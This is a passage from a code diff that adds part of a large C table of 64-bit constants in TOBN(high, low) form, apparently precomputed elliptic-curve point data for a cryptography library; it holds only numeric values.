+     TOBN(0x445bc395, 0x4ca88747), TOBN(0xedeaa2e0, 0x9fd53535),
+     TOBN(0x461b1d93, 0x6cc87475), TOBN(0xd92a52e2, 0x6d2383bd),
+     TOBN(0xfabccb59, 0xd7903546), TOBN(0x6111a761, 0x3d14b112),
+     TOBN(0x0ae584fe, 0xb3d5f612), TOBN(0x5ea69b8d, 0x60e828ec),
+     TOBN(0x6c078985, 0x54087030), TOBN(0x649cab04, 0xac4821fe),
+     TOBN(0x25ecedcf, 0x8bdce214), TOBN(0xb5622f72, 0x86af7361),
+     TOBN(0x0e1227aa, 0x7038b9e2), TOBN(0xd0efb273, 0xac20fa77),
+     TOBN(0x817ff88b, 0x79df975b), TOBN(0x856bf286, 0x1999503e),
+     TOBN(0xb4d5351f, 0x5038ec46), TOBN(0x740a52c5, 0xfc42af6e),
+     TOBN(0x2e38bb15, 0x2cbb1a3f), TOBN(0xc3eb99fe, 0x17a83429),
+     TOBN(0xca4fcbf1, 0xdd66bb74), TOBN(0x880784d6, 0xcde5e8fc),
+     TOBN(0xddc84c1c, 0xb4e7a0be), TOBN(0x8780510d, 0xbd15a72f),
+     TOBN(0x44bcf1af, 0x81ec30e1), TOBN(0x141e50a8, 0x0a61073e),
+     TOBN(0x0d955718, 0x47be87ae), TOBN(0x68a61417, 0xf76a4372),
+     TOBN(0xf57e7e87, 0xc607c3d3), TOBN(0x043afaf8, 0x5252f332),
+     TOBN(0xcc14e121, 0x1552a4d2), TOBN(0xb6dee692, 0xbb4d4ab4),
+     TOBN(0xb6ab74c8, 0xa03816a4), TOBN(0x84001ae4, 0x6f394a29),
+     TOBN(0x5bed8344, 0xd795fb45), TOBN(0x57326e7d, 0xb79f55a5),
+     TOBN(0xc9533ce0, 0x4accdffc), TOBN(0x53473caf, 0x3993fa04),
+     TOBN(0x7906eb93, 0xa13df4c8), TOBN(0xa73e51f6, 0x97cbe46f),
+     TOBN(0xd1ab3ae1, 0x0ae4ccf8), TOBN(0x25614508, 0x8a5b3dbc),
+     TOBN(0x61eff962, 0x11a71b27), TOBN(0xdf71412b, 0x6bb7fa39),
+     TOBN(0xb31ba6b8, 0x2bd7f3ef), TOBN(0xb0b9c415, 0x69180d29),
+     TOBN(0xeec14552, 0x014cdde5), TOBN(0x702c624b, 0x227b4bbb),
+     TOBN(0x2b15e8c2, 0xd3e988f3), TOBN(0xee3bcc6d, 0xa4f7fd04),
+     TOBN(0x9d00822a, 0x42ac6c85), TOBN(0x2db0cea6, 0x1df9f2b7),
+     TOBN(0xd7cad2ab, 0x42de1e58), TOBN(0x346ed526, 0x2d6fbb61),
+     TOBN(0xb3962995, 0x1a2faf09), TOBN(0x2fa8a580, 0x7c25612e),
+     TOBN(0x30ae04da, 0x7cf56490), TOBN(0x75662908, 0x0eea3961),
+     TOBN(0x3609f5c5, 0x3d080847), TOBN(0xcb081d39, 0x5241d4f6),
+     TOBN(0xb4fb3810, 0x77961a63), TOBN(0xc20c5984, 0x2abb66fc),
+     TOBN(0x3d40aa7c, 0xf902f245), TOBN(0x9cb12736, 0x4e536b1e),
+     TOBN(0x5eda24da, 0x99b3134f), TOBN(0xafbd9c69, 0x5cd011af),
+     TOBN(0x9a16e30a, 0xc7088c7d), TOBN(0x5ab65710, 0x3207389f),
+     TOBN(0x1b09547f, 0xe7407a53), TOBN(0x2322f9d7, 0x4fdc6eab),
+     TOBN(0xc0f2f22d, 0x7430de4d), TOBN(0x19382696, 0xe68ca9a9),
+     TOBN(0x17f1eff1, 0x918e5868), TOBN(0xe3b5b635, 0x586f4204),
+     TOBN(0x146ef980, 0x3fbc4341), TOBN(0x359f2c80, 0x5b5eed4e),
+     TOBN(0x9f35744e, 0x7482e41d), TOBN(0x9a9ac3ec, 0xf3b224c2),
+     TOBN(0x9161a6fe, 0x91fc50ae), TOBN(0x89ccc66b, 0xc613fa7c),
+     TOBN(0x89268b14, 0xc732f15a), TOBN(0x7cd6f4e2, 0xb467ed03),
+     TOBN(0xfbf79869, 0xce56b40e), TOBN(0xf93e094c, 0xc02dde98),
+     TOBN(0xefe0c3a8, 0xedee2cd7), TOBN(0x90f3ffc0, 0xb268fd42),
+     TOBN(0x81a7fd56, 0x08241aed), TOBN(0x95ab7ad8, 0x00b1afe8),
+     TOBN(0x40127056, 0x3e310d52), TOBN(0xd3ffdeb1, 0x09d9fc43),
+     TOBN(0xc8f85c91, 0xd11a8594), TOBN(0x2e74d258, 0x31cf6db8),
+     TOBN(0x829c7ca3, 0x02b5dfd0), TOBN(0xe389cfbe, 0x69143c86),
+     TOBN(0xd01b6405, 0x941768d8), TOBN(0x45103995, 0x03bf825d),
+     TOBN(0xcc4ee166, 0x56cd17e2), TOBN(0xbea3c283, 0xba037e79),
+     TOBN(0x4e1ac06e, 0xd9a47520), TOBN(0xfbfe18aa, 0xaf852404),
+     TOBN(0x5615f8e2, 0x8087648a), TOBN(0x7301e47e, 0xb9d150d9),
+     TOBN(0x79f9f9dd, 0xb299b977), TOBN(0x76697a7b, 0xa5b78314),
+     TOBN(0x10d67468, 0x7d7c90e7), TOBN(0x7afffe03, 0x937210b5),
+     TOBN(0x5aef3e4b, 0x28c22cee), TOBN(0xefb0ecd8, 0x09fd55ae),
+     TOBN(0x4cea7132, 0x0d2a5d6a), TOBN(0x9cfb5fa1, 0x01db6357),
+     TOBN(0x395e0b57, 0xf36e1ac5), TOBN(0x008fa9ad, 0x36cafb7d),
+     TOBN(0x8f6cdf70, 0x5308c4db), TOBN(0x51527a37, 0x95ed2477),
+     TOBN(0xba0dee30, 0x5bd21311), TOBN(0x6ed41b22, 0x909c90d7),
+     TOBN(0xc5f6b758, 0x7c8696d3), TOBN(0x0db8eaa8, 0x3ce83a80),
+     TOBN(0xd297fe37, 0xb24b4b6f), TOBN(0xfe58afe8, 0x522d1f0d),
+     TOBN(0x97358736, 0x8c98dbd9), TOBN(0x6bc226ca, 0x9454a527),
+     TOBN(0xa12b384e, 0xce53c2d0), TOBN(0x779d897d, 0x5e4606da),
+     TOBN(0xa53e47b0, 0x73ec12b0), TOBN(0x462dbbba, 0x5756f1ad),
+     TOBN(0x69fe09f2, 0xcafe37b6), TOBN(0x273d1ebf, 0xecce2e17),
+     TOBN(0x8ac1d538, 0x3cf607fd), TOBN(0x8035f7ff, 0x12e10c25),}
+    ,
+    {TOBN(0x854d34c7, 0x7e6c5520), TOBN(0xc27df9ef, 0xdcb9ea58),
+     TOBN(0x405f2369, 0xd686666d), TOBN(0x29d1febf, 0x0417aa85),
+     TOBN(0x9846819e, 0x93470afe), TOBN(0x3e6a9669, 0xe2a27f9e),
+     TOBN(0x24d008a2, 0xe31e6504), TOBN(0xdba7cecf, 0x9cb7680a),
+     TOBN(0xecaff541, 0x338d6e43), TOBN(0x56f7dd73, 0x4541d5cc),
+     TOBN(0xb5d426de, 0x96bc88ca), TOBN(0x48d94f6b, 0x9ed3a2c3),
+     TOBN(0x6354a3bb, 0x2ef8279c), TOBN(0xd575465b, 0x0b1867f2),
+     TOBN(0xef99b0ff, 0x95225151), TOBN(0xf3e19d88, 0xf94500d8),
+     TOBN(0x92a83268, 0xe32dd620), TOBN(0x913ec99f, 0x627849a2),
+     TOBN(0xedd8fdfa, 0x2c378882), TOBN(0xaf96f33e, 0xee6f8cfe),
+     TOBN(0xc06737e5, 0xdc3fa8a5), TOBN(0x236bb531, 0xb0b03a1d),
+     TOBN(0x33e59f29, 0x89f037b0), TOBN(0x13f9b5a7, 0xd9a12a53),
+     TOBN(0x0d0df6ce, 0x51efb310), TOBN(0xcb5b2eb4, 0x958df5be),
+     TOBN(0xd6459e29, 0x36158e59), TOBN(0x82aae2b9, 0x1466e336),
+     TOBN(0xfb658a39, 0x411aa636), TOBN(0x7152ecc5, 0xd4c0a933),
+     TOBN(0xf10c758a, 0x49f026b7), TOBN(0xf4837f97, 0xcb09311f),
+     TOBN(0xddfb02c4, 0xc753c45f), TOBN(0x18ca81b6, 0xf9c840fe),
+     TOBN(0x846fd09a, 0xb0f8a3e6), TOBN(0xb1162add, 0xe7733dbc),
+     TOBN(0x7070ad20, 0x236e3ab6), TOBN(0xf88cdaf5, 0xb2a56326),
+     TOBN(0x05fc8719, 0x997cbc7a), TOBN(0x442cd452, 0x4b665272),
+     TOBN(0x7807f364, 0xb71698f5), TOBN(0x6ba418d2, 0x9f7b605e),
+     TOBN(0xfd20b00f, 0xa03b2cbb), TOBN(0x883eca37, 0xda54386f),
+     TOBN(0xff0be43f, 0xf3437f24), TOBN(0xe910b432, 0xa48bb33c),
+     TOBN(0x4963a128, 0x329df765), TOBN(0xac1dd556, 0xbe2fe6f7),
+     TOBN(0x557610f9, 0x24a0a3fc), TOBN(0x38e17bf4, 0xe881c3f9),
+     TOBN(0x6ba84faf, 0xed0dac99), TOBN(0xd4a222c3, 0x59eeb918),
+     TOBN(0xc79c1dbe, 0x13f542b6), TOBN(0x1fc65e0d, 0xe425d457),
+     TOBN(0xeffb754f, 0x1debb779), TOBN(0x638d8fd0, 0x9e08af60),
+     TOBN(0x994f523a, 0x626332d5), TOBN(0x7bc38833, 0x5561bb44),
+     TOBN(0x005ed4b0, 0x3d845ea2), TOBN(0xd39d3ee1, 0xc2a1f08a),
+     TOBN(0x6561fdd3, 0xe7676b0d), TOBN(0x620e35ff, 0xfb706017),
+     TOBN(0x36ce424f, 0xf264f9a8), TOBN(0xc4c3419f, 0xda2681f7),
+     TOBN(0xfb6afd2f, 0x69beb6e8), TOBN(0x3a50b993, 0x6d700d03),
+     TOBN(0xc840b2ad, 0x0c83a14f), TOBN(0x573207be, 0x54085bef),
+     TOBN(0x5af882e3, 0x09fe7e5b), TOBN(0x957678a4, 0x3b40a7e1),
+     TOBN(0x172d4bdd, 0x543056e2), TOBN(0x9c1b26b4, 0x0df13c0a),
+     TOBN(0x1c30861c, 0xf405ff06), TOBN(0xebac86bd, 0x486e828b),
+     TOBN(0xe791a971, 0x636933fc), TOBN(0x50e7c2be, 0x7aeee947),
+     TOBN(0xc3d4a095, 0xfa90d767), TOBN(0xae60eb7b, 0xe670ab7b),
+     TOBN(0x17633a64, 0x397b056d), TOBN(0x93a21f33, 0x105012aa),
+     TOBN(0x663c370b, 0xabb88643), TOBN(0x91df36d7, 0x22e21599),
+     TOBN(0x183ba835, 0x8b761671), TOBN(0x381eea1d, 0x728f3bf1),
+     TOBN(0xb9b2f1ba, 0x39966e6c), TOBN(0x7c464a28, 0xe7295492),
+     TOBN(0x0fd5f70a, 0x09b26b7f), TOBN(0xa9aba1f9, 0xfbe009df),
+     TOBN(0x857c1f22, 0x369b87ad), TOBN(0x3c00e5d9, 0x32fca556),
+     TOBN(0x1ad74cab, 0x90b06466), TOBN(0xa7112386, 0x550faaf2),
+     TOBN(0x7435e198, 0x6d9bd5f5), TOBN(0x2dcc7e38, 0x59c3463f),
+     TOBN(0xdc7df748, 0xca7bd4b2), TOBN(0x13cd4c08, 0x9dec2f31),
+     TOBN(0x0d3b5df8, 0xe3237710), TOBN(0x0dadb26e, 0xcbd2f7b0),
+     TOBN(0x9f5966ab, 0xe4aa082b), TOBN(0x666ec8de, 0x350e966e),
+     TOBN(0x1bfd1ed5, 0xee524216), TOBN(0xcd93c59b, 0x41dab0b6),
+     TOBN(0x658a8435, 0xd186d6ba), TOBN(0x1b7d34d2, 0x159d1195),
+     TOBN(0x5936e460, 0x22caf46b), TOBN(0x6a45dd8f, 0x9a96fe4f),
+     TOBN(0xf7925434, 0xb98f474e), TOBN(0x41410412, 0x0053ef15),
+     TOBN(0x71cf8d12, 0x41de97bf), TOBN(0xb8547b61, 0xbd80bef4),
+     TOBN(0xb47d3970, 0xc4db0037), TOBN(0xf1bcd328, 0xfef20dff),
+     TOBN(0x31a92e09, 0x10caad67), TOBN(0x1f591960, 0x5531a1e1),
+     TOBN(0x3bb852e0, 0x5f4fc840), TOBN(0x63e297ca, 0x93a72c6c),
+     TOBN(0x3c2b0b2e, 0x49abad67), TOBN(0x6ec405fc, 0xed3db0d9),
+     TOBN(0xdc14a530, 0x7fef1d40), TOBN(0xccd19846, 0x280896fc),
+     TOBN(0x00f83176, 0x9bb81648), TOBN(0xd69eb485, 0x653120d0),
+     TOBN(0xd17d75f4, 0x4ccabc62), TOBN(0x34a07f82, 0xb749fcb1),
+     TOBN(0x2c3af787, 0xbbfb5554), TOBN(0xb06ed4d0, 0x62e283f8),
+     TOBN(0x5722889f, 0xa19213a0), TOBN(0x162b085e, 0xdcf3c7b4),
+     TOBN(0xbcaecb31, 0xe0dd3eca), TOBN(0xc6237fbc, 0xe52f13a5),
+     TOBN(0xcc2b6b03, 0x27bac297), TOBN(0x2ae1cac5, 0xb917f54a),
+     TOBN(0x474807d4, 0x7845ae4f), TOBN(0xfec7dd92, 0xce5972e0),
+     TOBN(0xc3bd2541, 0x1d7915bb), TOBN(0x66f85dc4, 0xd94907ca),
+     TOBN(0xd981b888, 0xbdbcf0ca), TOBN(0xd75f5da6, 0xdf279e9f),
+     TOBN(0x128bbf24, 0x7054e934), TOBN(0x3c6ff6e5, 0x81db134b),
+     TOBN(0x795b7cf4, 0x047d26e4), TOBN(0xf370f7b8, 0x5049ec37),
+     TOBN(0xc6712d4d, 0xced945af), TOBN(0xdf30b5ec, 0x095642bc),
+     TOBN(0x9b034c62, 0x4896246e), TOBN(0x5652c016, 0xee90bbd1),
+     TOBN(0xeb38636f, 0x87fedb73), TOBN(0x5e32f847, 0x0135a613),
+     TOBN(0x0703b312, 0xcf933c83), TOBN(0xd05bb76e, 0x1a7f47e6),
+     TOBN(0x825e4f0c, 0x949c2415), TOBN(0x569e5622, 0x7250d6f8),
+     TOBN(0xbbe9eb3a, 0x6568013e), TOBN(0x8dbd203f, 0x22f243fc),
+     TOBN(0x9dbd7694, 0xb342734a), TOBN(0x8f6d12f8, 0x46afa984),
+     TOBN(0xb98610a2, 0xc9eade29), TOBN(0xbab4f323, 0x47dd0f18),
+     TOBN(0x5779737b, 0x671c0d46), TOBN(0x10b6a7c6, 0xd3e0a42a),
+     TOBN(0xfb19ddf3, 0x3035b41c), TOBN(0xd336343f, 0x99c45895),
+     TOBN(0x61fe4938, 0x54c857e5), TOBN(0xc4d506be, 0xae4e57d5),
+     TOBN(0x3cd8c8cb, 0xbbc33f75), TOBN(0x7281f08a, 0x9262c77d),
+     TOBN(0x083f4ea6, 0xf11a2823), TOBN(0x8895041e, 0x9fba2e33),
+     TOBN(0xfcdfea49, 0x9c438edf), TOBN(0x7678dcc3, 0x91edba44),
+     TOBN(0xf07b3b87, 0xe2ba50f0), TOBN(0xc13888ef, 0x43948c1b),
+     TOBN(0xc2135ad4, 0x1140af42), TOBN(0x8e5104f3, 0x926ed1a7),
+     TOBN(0xf24430cb, 0x88f6695f), TOBN(0x0ce0637b, 0x6d73c120),
+     TOBN(0xb2db01e6, 0xfe631e8f), TOBN(0x1c5563d7, 0xd7bdd24b),
+     TOBN(0x8daea3ba, 0x369ad44f), TOBN(0x000c81b6, 0x8187a9f9),
+     TOBN(0x5f48a951, 0xaae1fd9a), TOBN(0xe35626c7, 0x8d5aed8a),
+     TOBN(0x20952763, 0x0498c622), TOBN(0x76d17634, 0x773aa504),
+     TOBN(0x36d90dda, 0xeb300f7a), TOBN(0x9dcf7dfc, 0xedb5e801),
+     TOBN(0x645cb268, 0x74d5244c), TOBN(0xa127ee79, 0x348e3aa2),
+     TOBN(0x488acc53, 0x575f1dbb), TOBN(0x95037e85, 0x80e6161e),
+     TOBN(0x57e59283, 0x292650d0), TOBN(0xabe67d99, 0x14938216),
+     TOBN(0x3c7f944b, 0x3f8e1065), TOBN(0xed908cb6, 0x330e8924),
+     TOBN(0x08ee8fd5, 0x6f530136), TOBN(0x2227b7d5, 0xd7ffc169),
+     TOBN(0x4f55c893, 0xb5cd6dd5), TOBN(0x82225e11, 0xa62796e8),
+     TOBN(0x5c6cead1, 0xcb18e12c), TOBN(0x4381ae0c, 0x84f5a51a),
+     TOBN(0x345913d3, 0x7fafa4c8), TOBN(0x3d918082, 0x0491aac0),
+     TOBN(0x9347871f, 0x3e69264c), TOBN(0xbea9dd3c, 0xb4f4f0cd),
+     TOBN(0xbda5d067, 0x3eadd3e7), TOBN(0x0033c1b8, 0x0573bcd8),
+     TOBN(0x25589379, 0x5da2486c), TOBN(0xcb89ee5b, 0x86abbee7),
+     TOBN(0x8fe0a8f3, 0x22532e5d), TOBN(0xb6410ff0, 0x727dfc4c),
+     TOBN(0x619b9d58, 0x226726db), TOBN(0x5ec25669, 0x7a2b2dc7),
+     TOBN(0xaf4d2e06, 0x4c3beb01), TOBN(0x852123d0, 0x7acea556),
+     TOBN(0x0e9470fa, 0xf783487a), TOBN(0x75a7ea04, 0x5664b3eb),
+     TOBN(0x4ad78f35, 0x6798e4ba), TOBN(0x9214e6e5, 0xc7d0e091),
+     TOBN(0xc420b488, 0xb1290403), TOBN(0x64049e0a, 0xfc295749),
+     TOBN(0x03ef5af1, 0x3ae9841f), TOBN(0xdbe4ca19, 0xb0b662a6),
+     TOBN(0x46845c5f, 0xfa453458), TOBN(0xf8dabf19, 0x10b66722),
+     TOBN(0xb650f0aa, 0xcce2793b), TOBN(0x71db851e, 0xc5ec47c1),
+     TOBN(0x3eb78f3e, 0x3b234fa9), TOBN(0xb0c60f35, 0xfc0106ce),
+     TOBN(0x05427121, 0x774eadbd), TOBN(0x25367faf, 0xce323863),
+     TOBN(0x7541b5c9, 0xcd086976), TOBN(0x4ff069e2, 0xdc507ad1),
+     TOBN(0x74145256, 0x8776e667), TOBN(0x6e76142c, 0xb23c6bb5),
+     TOBN(0xdbf30712, 0x1b3a8a87), TOBN(0x60e7363e, 0x98450836),
+     TOBN(0x5741450e, 0xb7366d80), TOBN(0xe4ee14ca, 0x4837dbdf),
+     TOBN(0xa765eb9b, 0x69d4316f), TOBN(0x04548dca, 0x8ef43825),
+     TOBN(0x9c9f4e4c, 0x5ae888eb), TOBN(0x733abb51, 0x56e9ac99),
+     TOBN(0xdaad3c20, 0xba6ac029), TOBN(0x9b8dd3d3, 0x2ba3e38e),
+     TOBN(0xa9bb4c92, 0x0bc5d11a), TOBN(0xf20127a7, 0x9c5f88a3),
+     TOBN(0x4f52b06e, 0x161d3cb8), TOBN(0x26c1ff09, 0x6afaf0a6),
+     TOBN(0x32670d2f, 0x7189e71f), TOBN(0xc6438748, 0x5ecf91e7),
+     TOBN(0x15758e57, 0xdb757a21), TOBN(0x427d09f8, 0x290a9ce5),
+     TOBN(0x846a308f, 0x38384a7a), TOBN(0xaac3acb4, 0xb0732b99),
+     TOBN(0x9e941009, 0x17845819), TOBN(0x95cba111, 0xa7ce5e03),
+     TOBN(0x6f3d4f7f, 0xb00009c4), TOBN(0xb8396c27, 0x8ff28b5f),
+     TOBN(0xb1a9ae43, 0x1c97975d), TOBN(0x9d7ba8af, 0xe5d9fed5),
+     TOBN(0x338cf09f, 0x34f485b6), TOBN(0xbc0ddacc, 0x64122516),
+     TOBN(0xa450da12, 0x05d471fe), TOBN(0x4c3a6250, 0x628dd8c9),
+     TOBN(0x69c7d103, 0xd1295837), TOBN(0xa2893e50, 0x3807eb2f),
+     TOBN(0xd6e1e1de, 0xbdb41491), TOBN(0xc630745b, 0x5e138235),
+     TOBN(0xc892109e, 0x48661ae1), TOBN(0x8d17e7eb, 0xea2b2674),
+     TOBN(0x00ec0f87, 0xc328d6b5), TOBN(0x6d858645, 0xf079ff9e),
+     TOBN(0x6cdf243e, 0x19115ead), TOBN(0x1ce1393e, 0x4bac4fcf),
+     TOBN(0x2c960ed0, 0x9c29f25b), TOBN(0x59be4d8e, 0x9d388a05),
+     TOBN(0x0d46e06c, 0xd0def72b), TOBN(0xb923db5d, 0xe0342748),
+     TOBN(0xf7d3aacd, 0x936d4a3d), TOBN(0x558519cc, 0x0b0b099e),
+     TOBN(0x3ea8ebf8, 0x827097ef), TOBN(0x259353db, 0xd054f55d),
+     TOBN(0x84c89abc, 0x6d2ed089), TOBN(0x5c548b69, 0x8e096a7c),
+     TOBN(0xd587f616, 0x994b995d), TOBN(0x4d1531f6, 0xa5845601),
+     TOBN(0x792ab31e, 0x451fd9f0), TOBN(0xc8b57bb2, 0x65adf6ca),
+     TOBN(0x68440fcb, 0x1cd5ad73), TOBN(0xb9c860e6, 0x6144da4f),
+     TOBN(0x2ab286aa, 0x8462beb8), TOBN(0xcc6b8fff, 0xef46797f),
+     TOBN(0xac820da4, 0x20c8a471), TOBN(0x69ae05a1, 0x77ff7faf),
+     TOBN(0xb9163f39, 0xbfb5da77), TOBN(0xbd03e590, 0x2c73ab7a),
+     TOBN(0x7e862b5e, 0xb2940d9e), TOBN(0x3c663d86, 0x4b9af564),
+     TOBN(0xd8309031, 0xbde3033d), TOBN(0x298231b2, 0xd42c5bc6),
+     TOBN(0x42090d2c, 0x552ad093), TOBN(0xa4799d1c, 0xff854695),
+     TOBN(0x0a88b5d6, 0xd31f0d00), TOBN(0xf8b40825, 0xa2f26b46),
+     TOBN(0xec29b1ed, 0xf1bd7218), TOBN(0xd491c53b, 0x4b24c86e),
+     TOBN(0xd2fe588f, 0x3395ea65), TOBN(0x6f3764f7, 0x4456ef15),
+     TOBN(0xdb43116d, 0xcdc34800), TOBN(0xcdbcd456, 0xc1e33955),
+     TOBN(0xefdb5540, 0x74ab286b), TOBN(0x948c7a51, 0xd18c5d7c),
+     TOBN(0xeb81aa37, 0x7378058e), TOBN(0x41c746a1, 0x04411154),
+     TOBN(0xa10c73bc, 0xfb828ac7), TOBN(0x6439be91, 0x9d972b29),
+     TOBN(0x4bf3b4b0, 0x43a2fbad), TOBN(0x39e6dadf, 0x82b5e840),
+     TOBN(0x4f716408, 0x6397bd4c), TOBN(0x0f7de568, 0x7f1eeccb),
+     TOBN(0x5865c5a1, 0xd2ffbfc1), TOBN(0xf74211fa, 0x4ccb6451),
+     TOBN(0x66368a88, 0xc0b32558), TOBN(0x5b539dc2, 0x9ad7812e),
+     TOBN(0x579483d0, 0x2f3af6f6), TOBN(0x52132078, 0x99934ece),
+     TOBN(0x50b9650f, 0xdcc9e983), TOBN(0xca989ec9, 0xaee42b8a),
+     TOBN(0x6a44c829, 0xd6f62f99), TOBN(0x8f06a309, 0x4c2a7c0c),
+     TOBN(0x4ea2b3a0, 0x98a0cb0a), TOBN(0x5c547b70, 0xbeee8364),
+     TOBN(0x461d40e1, 0x682afe11), TOBN(0x9e0fc77a, 0x7b41c0a8),
+     TOBN(0x79e4aefd, 0xe20d5d36), TOBN(0x2916e520, 0x32dd9f63),
+     TOBN(0xf59e52e8, 0x3f883faf), TOBN(0x396f9639, 0x2b868d35),
+     TOBN(0xc902a9df, 0x4ca19881), TOBN(0x0fc96822, 0xdb2401a6),
+     TOBN(0x41237587, 0x66f1c68d), TOBN(0x10fc6de3, 0xfb476c0d),
+     TOBN(0xf8b6b579, 0x841f5d90), TOBN(0x2ba8446c, 0xfa24f44a),
+     TOBN(0xa237b920, 0xef4a9975), TOBN(0x60bb6004, 0x2330435f),
+     TOBN(0xd6f4ab5a, 0xcfb7e7b5), TOBN(0xb2ac5097, 0x83435391),
+     TOBN(0xf036ee2f, 0xb0d1ea67), TOBN(0xae779a6a, 0x74c56230),
+     TOBN(0x59bff8c8, 0xab838ae6), TOBN(0xcd83ca99, 0x9b38e6f0),
+     TOBN(0xbb27bef5, 0xe33deed3), TOBN(0xe6356f6f, 0x001892a8),
+     TOBN(0xbf3be6cc, 0x7adfbd3e), TOBN(0xaecbc81c, 0x33d1ac9d),
+     TOBN(0xe4feb909, 0xe6e861dc), TOBN(0x90a247a4, 0x53f5f801),
+     TOBN(0x01c50acb, 0x27346e57), TOBN(0xce29242e, 0x461acc1b),
+     TOBN(0x04dd214a, 0x2f998a91), TOBN(0x271ee9b1, 0xd4baf27b),
+     TOBN(0x7e3027d1, 0xe8c26722), TOBN(0x21d1645c, 0x1820dce5),
+     TOBN(0x086f242c, 0x7501779c), TOBN(0xf0061407, 0xfa0e8009),
+     TOBN(0xf23ce477, 0x60187129), TOBN(0x05bbdedb, 0x0fde9bd0),
+     TOBN(0x682f4832, 0x25d98473), TOBN(0xf207fe85, 0x5c658427),
+     TOBN(0xb6fdd7ba, 0x4166ffa1), TOBN(0x0c314056, 0x9eed799d),
+     TOBN(0x0db8048f, 0x4107e28f), TOBN(0x74ed3871, 0x41216840),
+     TOBN(0x74489f8f, 0x56a3c06e), TOBN(0x1e1c005b, 0x12777134),
+     TOBN(0xdb332a73, 0xf37ec3c3), TOBN(0xc65259bd, 0xdd59eba0),
+     TOBN(0x2291709c, 0xdb4d3257), TOBN(0x9a793b25, 0xbd389390),
+     TOBN(0xf39fe34b, 0xe43756f0), TOBN(0x2f76bdce, 0x9afb56c9),
+     TOBN(0x9f37867a, 0x61208b27), TOBN(0xea1d4307, 0x089972c3),
+     TOBN(0x8c595330, 0x8bdf623a), TOBN(0x5f5accda, 0x8441fb7d),
+     TOBN(0xfafa9418, 0x32ddfd95), TOBN(0x6ad40c5a, 0x0fde9be7),
+     TOBN(0x43faba89, 0xaeca8709), TOBN(0xc64a7cf1, 0x2c248a9d),
+     TOBN(0x16620252, 0x72637a76), TOBN(0xaee1c791, 0x22b8d1bb),
+     TOBN(0xf0f798fd, 0x21a843b2), TOBN(0x56e4ed4d, 0x8d005cb1),
+     TOBN(0x355f7780, 0x1f0d8abe), TOBN(0x197b04cf, 0x34522326),
+     TOBN(0x41f9b31f, 0xfd42c13f), TOBN(0x5ef7feb2, 0xb40f933d),
+     TOBN(0x27326f42, 0x5d60bad4), TOBN(0x027ecdb2, 0x8c92cf89),
+     TOBN(0x04aae4d1, 0x4e3352fe), TOBN(0x08414d2f, 0x73591b90),
+     TOBN(0x5ed6124e, 0xb7da7d60), TOBN(0xb985b931, 0x4d13d4ec),
+     TOBN(0xa592d3ab, 0x96bf36f9), TOBN(0x012dbed5, 0xbbdf51df),
+     TOBN(0xa57963c0, 0xdf6c177d), TOBN(0x010ec869, 0x87ca29cf),
+     TOBN(0xba1700f6, 0xbf926dff), TOBN(0x7c9fdbd1, 0xf4bf6bc2),
+     TOBN(0xdc18dc8f, 0x64da11f5), TOBN(0xa6074b7a, 0xd938ae75),
+     TOBN(0x14270066, 0xe84f44a4), TOBN(0x99998d38, 0xd27b954e),
+     TOBN(0xc1be8ab2, 0xb4f38e9a), TOBN(0x8bb55bbf, 0x15c01016),
+     TOBN(0xf73472b4, 0x0ea2ab30), TOBN(0xd365a340, 0xf73d68dd),
+     TOBN(0xc01a7168, 0x19c2e1eb), TOBN(0x32f49e37, 0x34061719),
+     TOBN(0xb73c57f1, 0x01d8b4d6), TOBN(0x03c8423c, 0x26b47700),
+     TOBN(0x321d0bc8, 0xa4d8826a), TOBN(0x6004213c, 0x4bc0e638),
+     TOBN(0xf78c64a1, 0xc1c06681), TOBN(0x16e0a16f, 0xef018e50),
+     TOBN(0x31cbdf91, 0xdb42b2b3), TOBN(0xf8f4ffce, 0xe0d36f58),
+     TOBN(0xcdcc71cd, 0x4cc5e3e0), TOBN(0xd55c7cfa, 0xa129e3e0),
+     TOBN(0xccdb6ba0, 0x0fb2cbf1), TOBN(0x6aba0005, 0xc4bce3cb),
+     TOBN(0x501cdb30, 0xd232cfc4), TOBN(0x9ddcf12e, 0xd58a3cef),
+     TOBN(0x02d2cf9c, 0x87e09149), TOBN(0xdc5d7ec7, 0x2c976257),
+     TOBN(0x6447986e, 0x0b50d7dd), TOBN(0x88fdbaf7, 0x807f112a),
+     TOBN(0x58c9822a, 0xb00ae9f6), TOBN(0x6abfb950, 0x6d3d27e0),
+     TOBN(0xd0a74487, 0x8a429f4f), TOBN(0x0649712b, 0xdb516609),
+     TOBN(0xb826ba57, 0xe769b5df), TOBN(0x82335df2, 0x1fc7aaf2),
+     TOBN(0x2389f067, 0x5c93d995), TOBN(0x59ac367a, 0x68677be6),
+     TOBN(0xa77985ff, 0x21d9951b), TOBN(0x038956fb, 0x85011cce),
+     TOBN(0x608e48cb, 0xbb734e37), TOBN(0xc08c0bf2, 0x2be5b26f),
+     TOBN(0x17bbdd3b, 0xf9b1a0d9), TOBN(0xeac7d898, 0x10483319),
+     TOBN(0xc95c4baf, 0xbc1a6dea), TOBN(0xfdd0e2bf, 0x172aafdb),
+     TOBN(0x40373cbc, 0x8235c41a), TOBN(0x14303f21, 0xfb6f41d5),
+     TOBN(0xba063621, 0x0408f237), TOBN(0xcad3b09a, 0xecd2d1ed),
+     TOBN(0x4667855a, 0x52abb6a2), TOBN(0xba9157dc, 0xaa8b417b),
+     TOBN(0xfe7f3507, 0x4f013efb), TOBN(0x1b112c4b, 0xaa38c4a2),
+     TOBN(0xa1406a60, 0x9ba64345), TOBN(0xe53cba33, 0x6993c80b),
+     TOBN(0x45466063, 0xded40d23), TOBN(0x3d5f1f4d, 0x54908e25),
+     TOBN(0x9ebefe62, 0x403c3c31), TOBN(0x274ea0b5, 0x0672a624),
+     TOBN(0xff818d99, 0x451d1b71), TOBN(0x80e82643, 0x8f79cf79),
+     TOBN(0xa165df13, 0x73ce37f5), TOBN(0xa744ef4f, 0xfe3a21fd),
+     TOBN(0x73f1e7f5, 0xcf551396), TOBN(0xc616898e, 0x868c676b),
+     TOBN(0x671c28c7, 0x8c442c36), TOBN(0xcfe5e558, 0x5e0a317d),
+     TOBN(0x1242d818, 0x7051f476), TOBN(0x56fad2a6, 0x14f03442),
+     TOBN(0x262068bc, 0x0a44d0f6), TOBN(0xdfa2cd6e, 0xce6edf4e),
+     TOBN(0x0f43813a, 0xd15d1517), TOBN(0x61214cb2, 0x377d44f5),
+     TOBN(0xd399aa29, 0xc639b35f), TOBN(0x42136d71, 0x54c51c19),
+     TOBN(0x9774711b, 0x08417221), TOBN(0x0a5546b3, 0x52545a57),
